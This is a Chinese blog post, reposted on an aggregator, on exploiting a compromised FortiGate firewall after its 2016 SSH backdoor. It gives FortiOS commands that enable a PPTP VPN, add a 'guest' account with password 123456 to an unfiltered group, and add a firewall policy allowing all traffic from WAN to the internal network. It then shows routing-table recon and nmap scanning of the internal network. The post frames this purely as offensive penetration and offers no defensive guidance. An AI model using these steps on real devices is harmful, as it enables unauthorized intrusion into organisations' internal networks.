IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    飞塔SSH后门 进一步利用方法

    没穿底裤发表于 2016-01-13 05:05:39
    love 0

    from:tools.pwn.ren

    昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html)
    那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。
    这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的
    vpn服务来进入到内网中 ,从而进行进一步渗透。
    0X00 先看下用户组

      1. show user group

    e3235f0991e4f0dcd0592ff26b83da2e_75ba014a-bace-415d-bf80-d1ce8c688668-2[1]
    0x01开启vpn

      1. config vpn pptp
        set status enable
        set eip 192.168.200.100
        set sip 192.168.200.1
        set usrgrp Guest-group
        end
        config user local
        edit "guest"
        set type password
        set passwd 123456
        next
        end
        config user group
        edit "Guest-group"
        set profile "unfiltered"
        set member "guest"
        next
        end
        config firewall policy
        edit 9
        set srcintf "wan1"
        set dstintf "internal"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set schedule "always"
        set service "ANY"
        next
        end

         

    e3235f0991e4f0dcd0592ff26b83da2e_5KD1SI_HQ@U@3M71@V-2[1]
    0x02 内网进一步渗透
    查看路由表

      1. get router info routing-table all

    e3235f0991e4f0dcd0592ff26b83da2e_bf5ca6ffc8c071efd98b8306df7f17e9-2[1]

    这里已经成功连接上,并使用nmap扫描,这里记得你是防火墙root,所以你想去哪就去哪,想干嘛就干嘛。
    e3235f0991e4f0dcd0592ff26b83da2e_e30d50f9c9499dc25620bbbdb799774a-2[1]
    e3235f0991e4f0dcd0592ff26b83da2e_bf2c9c9ae42a5b5d660bb83498cad0c5-2[1]
    e3235f0991e4f0dcd0592ff26b83da2e_642dea9ff5d3f4b15a2bcfc81f3bd7e9-1[1])



沪ICP备19023445号-2号
友情链接